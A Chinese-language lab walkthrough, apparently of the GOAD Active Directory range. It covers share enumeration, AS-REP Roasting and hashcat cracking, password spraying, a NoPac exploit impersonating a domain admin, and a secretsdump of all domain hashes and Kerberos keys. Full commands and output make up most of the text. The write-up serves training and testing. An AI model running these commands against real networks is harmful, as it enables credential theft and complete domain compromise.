SMB         192.168.56.23   445    BRAAVOS          -----           -----------     ------
SMB         192.168.56.23   445    BRAAVOS          ADMIN$                          Remote Admin
SMB         192.168.56.23   445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         192.168.56.23   445    BRAAVOS          C$                              Default share
SMB         192.168.56.23   445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share
SMB         192.168.56.23   445    BRAAVOS          IPC$            READ            Remote IPC
SMB         192.168.56.23   445    BRAAVOS          public                          Basic Read share for all domain users
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

可以看到 all 这个共享对 Guest 开放了读写权限，这类未授权共享在实战里很值得优先翻。

有用户名但是没有密码的情况

AS-REP Roasting

例如，我们已经通过 ldapdomaindump 拿到了 north.sevenkingdoms.local 上的一批用户名。

sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator

把这些用户名保存到 users.txt 之后，继续枚举：

┌──(kali㉿kali)-[~]
└─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:c0d425fe45c54c3c18e875898bca120f$45ac4cb030568708dae3e1c6c2dc5777628b03f8c2a0c33cde1affe1005f3877c51d8c71a551bc2cec9d65b66ca4ee3dfac29d86e5adf504a3e1e627624951d1783896c0171c86530661894964b1faac172a3ba01fc851b43d54bfdec323e1502a9435f97a98c71c3a5794faeb1898393f448a387bef9483880de57fb38e9a3a16ff3709f6c01f5d51389a7e867d520ae37f30b1c5968abeeab45d0046d2e55f2235a94051938f261fb0fb4e91186c7588e0bb935b4dee180f0d66ac7d3c0cee54c0f78842495c662376e32815da9ca43d5a064d6af83336925e5634bd10f7cc60d4d9d7f9b3f4367b813d83dcf4f3e86dc18fd7ce2486aeaeca61b9c5d547ccb498d6bfa114
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

这样就拿到了 brandon.stark 的 AS-REP 哈希，接着用 hashcat 离线破解。

┌──(kali㉿kali)-[~]
└─$ hashcat -m 18200 asrephash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900H, 6956/13913 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (11083 MB free)

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:c0d425fe45c54c3c18e875898bca120f$45ac4cb030568708dae3e1c6c2dc5777628b03f8c2a0c33cde1affe1005f3877c51d8c71a551bc2cec9d65b66ca4ee3dfac29d86e5adf504a3e1e627624951d1783896c0171c86530661894964b1faac172a3ba01fc851b43d54bfdec323e1502a9435f97a98c71c3a5794faeb1898393f448a387bef9483880de57fb38e9a3a16ff3709f6c01f5d51389a7e867d520ae37f30b1c5968abeeab45d0046d2e55f2235a94051938f261fb0fb4e91186c7588e0bb935b4dee180f0d66ac7d3c0cee54c0f78842495c662376e32815da9ca43d5a064d6af83336925e5634bd10f7cc60d4d9d7f9b3f4367b813d83dcf4f3e86dc18fd7ce2486aeaeca61b9c5d547ccb498d6bfa114:iseedeadpeople

这样就拿到了 brandon.stark 的密码：iseedeadpeople。

密码喷洒

第一种情况是用户名和密码相同（现实里相对少见）。

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\hodor:hodor

第二种情况是弱口令复用，这时可以用 Kerbrute 做快速喷洒。

┌──(kali㉿kali)-[~]
└─$ kerbrute passwordspray -d north.sevenkingdoms.local --dc 192.168.56.11 users.txt hodor

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:56:44 >  Using KDC(s):
2025/12/21 06:56:44 >  192.168.56.11:88

2025/12/21 06:56:44 >  [+] VALID LOGIN: hodor@north.sevenkingdoms.local:hodor
2025/12/21 06:56:44 >  Done! Tested 16 logins (1 successes) in 0.019 seconds

总结

这次旅程里，我们总共拿到了 3 组有效凭据：

samwell.tarly:Heartsbane（用户描述泄露）
brandon.stark:iseedeadpeople（AS-REP Roasting）
hodor:hodor（密码喷洒）

本文参考了 Mayfly 师傅的很多思路，感兴趣的话可以去看原文。

【归档】GOAD 域渗透早期草稿：信息收集、匿名枚举与 NoPAC 初探

2025-12-20T12:06:26.000Z

这篇是我最早记录 GOAD 的草稿版本，包含信息收集、匿名枚举域用户、基础域信息获取，以及 NoPAC 的早期尝试。

这篇是早期草稿，内容相对粗糙，保留作归档。想看更完整的版本，建议直接跳到《GOAD 域渗透教程 1：内网扫描、域控识别与初始域用户获取》。

信息收集

扫描

1	nxc smb 192.168.56.0/24

有三台机器显示 signing: True，按经验基本可以先判成域控，再扫一下 LDAP 端口做验证。

1	nxc ldap 192.168.56.0/24

把这些机器加入 HOSTS 文件，后面用 Kerberos 相关服务时会方便很多。

寻找域账号

当域控允许匿名 SMB 连接时，就有机会直接枚举出域账号。

1	nxc smb 192.168.56.0/24 --users

这就直接给我们一个账号密码，只能说靶场就是靶场。

samwell.tarly:Heartsbane

获取域信息

这样就能继续通过 LDAP 认证获取更多域信息。

┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

很遗憾，这个账号并不在 Domain Admins 组里。

攻击 NORTH.SEVENKINGDOMS.LOCAL

我们目前有两台机器在NORTH.SEVENKINGDOMS.LOCAL域内

1
2

SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)

根据 ldapdomaindump 的结果，这个域里有两名域管理员：

1 2	eddard.stark Administrator

同时我们已经拿到一个普通域用户的账号密码：

samwell.tarly:Heartsbane

有域账户后，就可以开始扫一些常见的提权点，比如 NoPac、PrintNightmare。

先用 NetExec 做一轮扫描。

┌──(kali㉿kali)-[~/Downloads/krbrelayx-master]
└─$ nxc smb 192.168.56.11 -u samwell.tarly -p -M nopac -M spooler
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
NOPAC       192.168.56.11   445    WINTERFELL       TGT with PAC size 1654
NOPAC       192.168.56.11   445    WINTERFELL       TGT without PAC size 817
NOPAC       192.168.56.11   445    WINTERFELL
NOPAC       192.168.56.11   445    WINTERFELL       VULNERABLE
NOPAC       192.168.56.11   445    WINTERFELL       Next step: https://github.com/Ridter/noPac
SPOOLER     192.168.56.11   445    WINTERFELL       Spooler service enabled

利用 NoPac

这里可以直接使用 Ridter/noPac。

┌──(noPac)─(kali㉿kali)-[~/Downloads/noPac]
└─$ python3 noPac.py north.sevenkingdoms.local/samwell.tarly:Heartsbane -dc-ip 192.168.56.11

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target winterfell.north.sevenkingdoms.local
[*] Total Domain Admins 3
[*] will try to impersonate eddard.stark
[*] Adding Computer Account "WIN-SXKFGMHCLVY$"
[*] MachineAccount "WIN-SXKFGMHCLVY$" password = 19EqF0n0imc2
[*] Successfully added machine account WIN-SXKFGMHCLVY$ with password 19EqF0n0imc2.
[*] WIN-SXKFGMHCLVY$ object = CN=WIN-SXKFGMHCLVY,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
[*] WIN-SXKFGMHCLVY$ sAMAccountName == winterfell
[*] Saving a DC's ticket in winterfell.ccache
[*] Reseting the machine account to WIN-SXKFGMHCLVY$
[*] Restored WIN-SXKFGMHCLVY$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating eddard.stark
[*] Requesting S4U2self
[*] Saving a user's ticket in eddard.stark.ccache
[*] Rename ccache to eddard.stark_winterfell.north.sevenkingdoms.local.ccache
[*] Attempting to del a computer with the name: WIN-SXKFGMHCLVY$
[-] Delete computer WIN-SXKFGMHCLVY$ Failed! Maybe the current user does not have permission.

虽然删除机器账户失败了，但问题不大，关键是票据已经申请到了。

secretsdump 导出

接下来用 secretsdump 直接把域凭据导出来。

┌──(kali㉿kali)-[~/Downloads/noPac]
└─$ ls -lian eddard.stark_winterfell.north.sevenkingdoms.local.ccache
3689526 -rw-rw-r-- 1 1000 1000 1545 Dec 20 10:03 eddard.stark_winterfell.north.sevenkingdoms.local.ccache

┌──(kali㉿kali)-[~/Downloads/noPac]
└─$export KRB5CCNAME=eddard.stark_winterfell.north.sevenkingdoms.local.ccache
3689526 -rw-rw-r-- 1 1000 1000 1545 Dec 20 10:03 eddard.stark_winterfell.north.sevenkingdoms.local.ccache

┌──(kali㉿kali)-[~/Downloads/noPac]
└─$ impacket-secretsdump -k -no-pass eddard.stark@winterfell.north.sevenkingdoms.local -just-dc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1afc3352b8464b283bc168d3dd935c78:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
north.sevenkingdoms.local\admin01:1125:aad3b435b51404eeaad3b435b51404ee:ebdf1f3a95ab808bbf01ecec1ebdc7ee:::
WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:019b67b6b314f318bda1fcdf56fdec45:::
CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:3a5c1723373cbe24b801b1cfecf6cec7:::
DESKTOP-HKO7PPDH$:1122:aad3b435b51404eeaad3b435b51404ee:05c7bca85e213cdea0ce9fc93a5c5952:::
krbrelay$:1123:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
win11$:1124:aad3b435b51404eeaad3b435b51404ee:106d6be7c86c1248e9f29410bf52891d:::
Test123$:1126:aad3b435b51404eeaad3b435b51404ee:4b130d040e6349f2813703bb671fef45:::
Test234$:1127:aad3b435b51404eeaad3b435b51404ee:04c53682276ad85b0680d03cbb608129:::
Test456$:1128:aad3b435b51404eeaad3b435b51404ee:04c53682276ad85b0680d03cbb608129:::
cd1234..$:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-SXKFGMHCLVY$:1131:aad3b435b51404eeaad3b435b51404ee:079b73f9d179047c70481513e24a60b1:::
SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:34831d00299c3d29c2e48fa7444afe8d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0
Administrator:des-cbc-md5:fe58cdcd13a43243
krbtgt:aes256-cts-hmac-sha1-96:2b2a02d222c517711baf01c1254a00ada695fd849fc8f0e92210587e10e257aa
krbtgt:aes128-cts-hmac-sha1-96:7a2021c885bcfc796aa694921c5a8b4a
krbtgt:des-cbc-md5:944032f875df7576
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d
arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df
arya.stark:des-cbc-md5:13525243d6643285
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203
eddard.stark:des-cbc-md5:8067f7abecc7d346
catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283
catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93
catelyn.stark:des-cbc-md5:6b314670a2f84cfb
robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42
robb.stark:des-cbc-md5:c4b62c797f5dd01f
sansa.stark:aes256-cts-hmac-sha1-96:a268e7a385f4f165c6489c18a3bdeb52c5e505050449c6f9aeba4bc06a7fcbed
sansa.stark:aes128-cts-hmac-sha1-96:e2e6e885f6f4d3e25d759ea624961392
sansa.stark:des-cbc-md5:4c7c16e3f74cc4d3
brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10
brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73
brandon.stark:des-cbc-md5:76e61fda8a4f5245
rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda
rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d
rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a
hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287
hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60
hodor:des-cbc-md5:d5764373f2545dfd
jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb
jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b
jon.snow:des-cbc-md5:084358ceb3290d7c
samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605
samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae
samwell.tarly:des-cbc-md5:5efed0e0a45dd951
jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50
jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b
jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea
sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029
sql_svc:des-cbc-md5:8645d5cd402f16c7
north.sevenkingdoms.local\admin01:aes256-cts-hmac-sha1-96:932317d6c409d624aea9f223a3d47ec9042b4e7d0bc856324e918189ccf33c97
north.sevenkingdoms.local\admin01:aes128-cts-hmac-sha1-96:6fa2d0782fe5a9a8946acdc34779b905
north.sevenkingdoms.local\admin01:des-cbc-md5:bab51aeca1ec1ca7
WINTERFELL$:aes256-cts-hmac-sha1-96:9f46dd231e24cd29a4fb9c92cc4bfb52ac90c4afedad4527ca3b3b879b9682b2
WINTERFELL$:aes128-cts-hmac-sha1-96:528ed5d9308e2a82a0d68748cb5d6c81
WINTERFELL$:des-cbc-md5:7ff72c75d5d683b5
CASTELBLACK$:aes256-cts-hmac-sha1-96:6f5423d17fd317a6bec4cfb0fe0872bfc43597cb622351b9c8ccfeca38d3be62
CASTELBLACK$:aes128-cts-hmac-sha1-96:ccdacc849a0c9800078212adb3f6f851
CASTELBLACK$:des-cbc-md5:6e68a4a19454349b
DESKTOP-HKO7PPDH$:aes256-cts-hmac-sha1-96:86c358a1374a7734c9da842e359e3fae878e7fcbe68ba40cf9dc61a399842f51
DESKTOP-HKO7PPDH$:aes128-cts-hmac-sha1-96:b4df35e06ffe272af05bf23c130d8d07
DESKTOP-HKO7PPDH$:des-cbc-md5:687c19cdaba49132
krbrelay$:aes256-cts-hmac-sha1-96:9b24562bed8ff22f72ddb14c597c74889100ce2b84749a396b4af47876be2f7f
krbrelay$:aes128-cts-hmac-sha1-96:513eabc0aa30a686a2e5fb4b937615ef
krbrelay$:des-cbc-md5:aec4043738c7e38c
win11$:aes256-cts-hmac-sha1-96:1a0872d983af4250b4eac66af59fdb3c57a35ccd1967420228810c526a35915e
win11$:aes128-cts-hmac-sha1-96:221795e2c6278e258edcb2750355adc5
win11$:des-cbc-md5:04fea88c9419a432
Test123$:aes256-cts-hmac-sha1-96:ddec45e9ba6aa0c87f5bfe1f732eda7bb66c97486beb7c69b0cfb8cddeef28ee
Test123$:aes128-cts-hmac-sha1-96:6341bf5ed96823f7d39af437c07a2e92
Test123$:des-cbc-md5:e07a4adc325d2c9e
Test234$:aes256-cts-hmac-sha1-96:f8746b95c42047051fa169f81b58ec88e1f8aac60dfe2c58cecab09b116ca32f
Test234$:aes128-cts-hmac-sha1-96:5114a367c629151d9e92c70ef2a74ecc
Test234$:des-cbc-md5:97d686b997920bdc
Test456$:aes256-cts-hmac-sha1-96:0cf0c36a22200e0c87471cfc84b4c2ca3b2824d49af6c8bcc271e10b77acb653
Test456$:aes128-cts-hmac-sha1-96:707002b94973e6a27446b574a09fa4c4
Test456$:des-cbc-md5:5bd6d319d5b0524a
WIN-SXKFGMHCLVY$:aes256-cts-hmac-sha1-96:9116d96c8434751c276e7201cd20bad12794d60eedb700f036b3bc259d1cbb5f
WIN-SXKFGMHCLVY$:aes128-cts-hmac-sha1-96:35f20ca5201ec3b910164ea74b0628cc
WIN-SXKFGMHCLVY$:des-cbc-md5:1f324697b66e7f3e
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:b06b661d4b02880e55e846888400f36a46c37b492baf9fca43c181498b0081cc
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:bc137e4170c0c00794c618de0606988e
SEVENKINGDOMS$:des-cbc-md5:f483da8651026b86
[*] Cleaning up...

后面就可以用 Administrator 的哈希去删除我们刚注册的域机器账户，这里就不再继续展开了。